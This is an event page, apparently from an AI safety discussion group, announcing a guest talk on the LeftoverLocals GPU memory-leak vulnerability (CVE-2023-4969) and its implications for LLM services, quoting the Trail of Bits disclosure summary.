Back to All Events

Guest Adelin Travers Presents: LeftoverLocals: Listening to LLM responses Through Leaked GPU Local Memory

As big labs become more aware of the safety (and business) implications of model weights leaking to bad actors, there has been renewed interest in cybersecurity and operational security in the safety community. Last December we discussed Anthropic’s Responsible Scaling Policy, which included cybersec / opsec recommendations we described as “things smart people who don’t know about cybersec / opsec would recommend”. Perhaps we should engage more closely with the cybersecurity community!

To that end, this week we have invited Adelin Travers as a guest speaker. Adelin works with the team at Trail of Bits which recently uncovered an important vulnerability (LeftOverLocals) that impacts GPUs used in ML systems. Their original blog post was also covered by Wired Magazine just a few weeks ago, on January 16th.

During the session, Adelin will give an overview of the intricate tech stack behind modern machine learning, making clear the extent of the attack surface. He’ll explain the LeftOverLocals vulnerability, and what implications it has for users and developers of AI services. We’ll discuss where LeftOverLocals stands in the general landscape of vulnerabilities, and the appropriate level of worry. We’ll also discuss what practices organizations can adopt to insulate themselves against LeftOverLocals and other vulnerabilities of its kind.

LeftoverLocals can leak ~5.5 MB per GPU invocation on an AMD Radeon RX 7900 XT which, when running a 7B model on llama.cpp, adds up to ~181 MB for each LLM query. This is enough information to reconstruct the LLM response with high precision. The vulnerability highlights that many parts of the ML development stack have unknown security risks and have not been rigorously reviewed by security experts.

This vulnerability is tracked by CVE-2023-4969. It was discovered by Tyler Sorensen as part of his work within the ML/AI Assurance team. Tyler Sorensen is also an assistant professor at UCSC. Since September 2023, we have been working with CERT Coordination Center on a large coordinated disclosure effort involving all major GPU vendors, including: NVIDIA, Apple, AMD, Arm, Intel, Qualcomm, and Imagination.

—Sorensen and Khlaaf. “LeftoverLocals: Listening to LLM responses through leaked GPU local memory”. Trail of Bits, January 2024.

Previous
Previous
7 February

Why Agent Foundations?

Next
Next
20 February

ML Benkyoukai: Direct Preference Optimization